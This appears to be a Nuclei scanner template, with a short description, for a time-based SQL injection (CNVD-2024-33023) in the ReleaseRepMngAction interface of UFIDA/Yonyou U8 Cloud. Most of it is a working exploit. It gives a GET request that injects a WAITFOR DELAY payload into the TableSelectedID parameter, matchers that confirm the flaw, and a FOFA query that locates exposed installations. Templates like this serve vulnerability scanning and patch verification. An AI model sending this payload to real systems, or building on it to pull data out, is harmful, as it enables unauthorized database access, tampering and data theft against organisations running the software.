The UFIDA U8 Cloud system interface ReleaseRepMngAction has a SQL injection vulnerability, which allows an attacker to manipulate the database through a maliciously constructed SQL statement, resulting in data leaks, tampering or destruction, and seriously threatening system security.
PoC代码[已公开]
id: CNVD-2024-33023
info:
name: UFIDA U8 Cloud - SQL Injection
author: s4e-io
severity: high
description: |
The UFIDA U8 Cloud system interface ReleaseRepMngAction has a SQL injection vulnerability, which allows an attacker to manipulate the database through a maliciously constructed SQL statement, resulting in data leaks, tampering or destruction, and seriously threatening system security.
reference:
- https://cap.oyg.cn/detail/431168
- https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BU8-Cloud%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3ReleaseRepMngAction%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0(CNVD-2024-33023).md
metadata:
verified: true
max-request: 1
fofa-query: title=="U8C"
tags: cnvd,cnvd2024,yonyou,u8-cloud,sqli,time-based-sqli
http:
- raw:
- |
@timeout 20s
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27-- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body,"iUFO")'
- 'contains(content_type,"text/html")'
condition: and
# digest: 490a00463044022033af6f7e6a9cf9812abafeae49719c773eaa8e0cc0d7e793598793e92abca60502207b75a2c545ebba079e7318992b58de398e5e75d629675bc34f06051bb90e4481:922c64590222798bb761d5b6d8e72950